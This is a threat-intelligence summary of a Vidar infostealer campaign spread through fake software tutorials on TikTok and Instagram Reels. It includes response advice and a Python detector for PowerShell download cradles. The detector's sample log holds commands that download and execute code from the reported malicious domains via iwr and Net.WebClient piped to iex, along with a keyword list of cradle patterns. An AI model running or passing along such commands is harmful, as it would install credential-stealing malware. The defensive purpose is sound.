Scammers Use Social Media to Distribute Vidar Infostealer via Fake Tutorials
Severity: High (Score: 67.5)
Sources: Infosecurity-Magazine, Scworld
Keywords: vidar, infostealer, tiktok, scammers, short, videos, spread
Severity indicators: stealer, infostealer
Summary
Threat actors are exploiting TikTok and Instagram Reels to distribute the Vidar infostealer, masquerading as software tutorials for free premium applications like Spotify. ReversingLabs reported two campaigns that utilize misleading branding and social engineering tactics to attract viewers. One campaign featured a video with over 100,000 views, directing users to execute commands that download the malware. The infostealer, sold as a service for $300, collects sensitive information such as passwords and banking data. The videos leverage platform algorithms favoring saved content, making detection challenging. Users are advised to avoid executing untrusted commands, and organizations should enhance training to recognize these threats. Reporting suspicious content is crucial to mitigate the impact of these scams.
Key Points:
• Scammers exploit TikTok and Instagram to distribute the Vidar infostealer.
• Fake software tutorials lure users into executing malicious commands.
• One video reached over 100,000 views, showcasing the effectiveness of the campaigns.
Detailed Analysis
**Impact**
Users of social media platforms TikTok and Instagram Reels are targeted globally through fake tutorials promising free access to premium software like Spotify Premium and Microsoft Word. The Vidar infostealer harvests credentials, financial data, and authentication tokens, risking significant personal and organizational data exposure. One video alone amassed over 100,000 views, indicating broad reach and potential for widespread compromise. No specific sectors or geographies beyond social media users were identified.
**Technical Details**
Attackers use short-form videos mimicking official branding to instruct users to execute PowerShell commands or engage with fake download sites gated by surveys. The PowerShell command downloads Vidar from lookalike domains such as msget[.]run and d4ug[.]site. Vidar is a malware-as-a-service infostealer that collects passwords, banking data, and browser cookies. The campaigns exploit social media algorithms favoring saves and shares to maximize distribution. No CVEs or zero-day exploits were reported.
**Recommended Response**
Audit and restrict software installation privileges within organizations immediately. Update phishing and social engineering training to include threats originating from social media platforms. Encourage employees to report suspicious social media content to increase takedown rates. Monitor for PowerShell command execution anomalies and block known malicious domains such as msget[.]run and d4ug[.]site.
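A defender-side check for the monitoring advice above, added here as an example and not taken from the source reports: it scans constructed PowerShell script-block log lines for the two lookalike domains named in the analysis and for common download-cradle keywords. The log line format, the cradle patterns and the alert threshold are assumptions.

```python
import re

# Domains named in the report, kept defanged as published; refanged only inside the matcher.
BLOCKED_DOMAINS = ["msget[.]run", "d4ug[.]site"]

# Download-cradle keywords typical of "paste this command" lures (assumed heuristics).
CRADLE_PATTERNS = [
    r"\b(?:iwr|invoke-webrequest|curl|wget)\b",
    r"\b(?:iex|invoke-expression)\b",
    r"net\.webclient",
    r"downloadstring|downloadfile",
    r"-(?:enc|encodedcommand)\b",
]

def refang(domain: str) -> str:
    """Turn the published defanged form back into a matchable hostname."""
    return domain.replace("[.]", ".")

def score_script_block(text: str) -> dict:
    """Report which indicators fire on one PowerShell script block.
    A known-bad domain alerts on its own; otherwise two or more cradle
    keywords together are needed, so a lone Invoke-WebRequest stays quiet."""
    lowered = text.lower()
    domains = [d for d in BLOCKED_DOMAINS if refang(d) in lowered]
    cradles = [p for p in CRADLE_PATTERNS if re.search(p, lowered)]
    return {"domains": domains, "cradles": cradles,
            "alert": bool(domains) or len(cradles) >= 2}

def triage(log_lines):
    """Return (line_number, finding) for every line that should alert."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        finding = score_script_block(line)
        if finding["alert"]:
            findings.append((n, finding))
    return findings

# Constructed sample log lines (not real telemetry), shaped like Event ID 4104 script-block text.
SAMPLE_LOG = [
    "4104 host=WS01 user=alice ScriptBlockText=Get-ChildItem C:\\Users\\alice\\Documents",
    "4104 host=WS02 user=bob ScriptBlockText=iwr http://msget.run/get | iex",
    "4104 host=WS03 user=carol ScriptBlockText=Invoke-WebRequest https://example.com/f.zip -OutFile f.zip",
    "4104 host=WS04 user=dave ScriptBlockText=(New-Object Net.WebClient).DownloadString('http://d4ug.site/x') | IEX",
]

if __name__ == "__main__":
    for n, finding in triage(SAMPLE_LOG):
        print(f"line {n}: domains={finding['domains']} cradles={len(finding['cradles'])}")
```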
Source articles (2)
- Fake Software Tutorials on TikTok Spread Vidar Stealer — Infosecurity-Magazine · 2026-06-10
  Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials for unlocking premium software for free. New analysis…
- Scammers use short videos on social media to spread Vidar infostealer — Scworld · 2026-06-10
  Per HackRead, scammers are exploiting the popularity of short video formats on platforms like TikTok and Instagram Reels to distribute the Vidar infostealer malware, a departure from traditional phish…
Timeline
- 2026-06-10 — ReversingLabs reports on Vidar infostealer campaigns: Two campaigns on TikTok and Instagram use fake tutorials to distribute Vidar, a malware that steals sensitive information.
- 2026-06-10 — Scammers mimic official branding in videos: Scammers create videos with Windows-like icons to build trust and instruct users to run malicious commands.
- Recent — Malware distributed via social media gains traction: Videos promoting free premium software have gained significant views, making detection and reporting difficult.
Related entities
- Malware (Attack Type)
- Phishing (Attack Type)
- d4ug.site (Domain)
- Vidar (Malware)
- Vidar Infostealer (Malware)
- T1059.001 - PowerShell (Mitre Attack)
- T1059 - Command and Scripting Interpreter (Mitre Attack)
- T1105 - Ingress Tool Transfer (Mitre Attack)
- Instagram (Platform)
- TikTok (Platform)
- Windows (Platform)
- Spotify (Company)
- PowerShell (Tool)